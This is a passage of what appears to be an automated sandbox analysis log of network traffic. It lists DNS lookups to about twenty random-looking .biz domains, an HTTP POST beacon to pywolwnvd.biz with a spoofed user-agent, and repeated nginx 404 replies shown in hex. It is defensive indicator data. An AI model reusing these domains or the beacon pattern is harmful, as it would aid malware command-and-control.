                      Source: global trafficDNS traffic detected: DNS query: wxgzshna.biz
                      Source: global trafficDNS traffic detected: DNS query: zrlssa.biz
                      Source: global trafficDNS traffic detected: DNS query: jlqltsjvh.biz
                      Source: global trafficDNS traffic detected: DNS query: xyrgy.biz
                      Source: global trafficDNS traffic detected: DNS query: htwqzczce.biz
                      Source: global trafficDNS traffic detected: DNS query: kvbjaur.biz
                      Source: global trafficDNS traffic detected: DNS query: uphca.biz
                      Source: global trafficDNS traffic detected: DNS query: fjumtfnz.biz
                      Source: global trafficDNS traffic detected: DNS query: hlzfuyy.biz
                      Source: global trafficDNS traffic detected: DNS query: rffxu.biz
                      Source: global trafficDNS traffic detected: DNS query: cikivjto.biz
                      Source: global trafficDNS traffic detected: DNS query: qncdaagct.biz
                      Source: global trafficDNS traffic detected: DNS query: shpwbsrw.biz
                      Source: global trafficDNS traffic detected: DNS query: cjvgcl.biz
                      Source: global trafficDNS traffic detected: DNS query: neazudmrq.biz
                      Source: global trafficDNS traffic detected: DNS query: pgfsvwx.biz
                      Source: global trafficDNS traffic detected: DNS query: aatcwo.biz
                      Source: global trafficDNS traffic detected: DNS query: kcyvxytog.biz
                      Source: global trafficDNS traffic detected: DNS query: nwdnxrd.biz
                      Source: global trafficDNS traffic detected: DNS query: ereplfx.biz
                      Source: unknownHTTP traffic detected: POST /nkrerhrn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 836
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 18 Nov 2024 08:58:25 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 18 Nov 2024 08:58:25 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 18 Nov 2024 08:58:34 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 18 Nov 2024 08:58:34 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Mon, 18 Nov 2024 08:58:59 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 18 Nov 2024 08:59:05 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 18 Nov 2024 08:59:05 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 18 Nov 2024 08:59:13 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 18 Nov 2024 08:59:13 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
